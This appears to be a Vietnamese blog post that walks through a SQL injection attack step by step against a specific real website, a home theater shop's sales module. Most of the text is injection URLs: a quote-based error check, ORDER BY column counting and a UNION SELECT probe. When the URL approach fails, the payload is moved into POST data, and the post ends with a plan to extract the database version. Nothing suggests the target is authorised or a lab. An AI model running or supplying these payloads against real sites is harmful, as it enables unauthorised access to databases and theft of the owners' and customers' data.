http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206
Bước 1: Check lỗi
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206'
Bước 2: Tìm số trường cột
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 2-- -
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 3-- -
Số trường cột cần tìm là 2
Bước 3: Xác định vị trí trường cột bị lỗi
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 and 0 UNION SELECT 1,2-- -
Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:
Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả
Tiếp theo chúng ta tìm version
....
P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.
Nguồn CEH
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.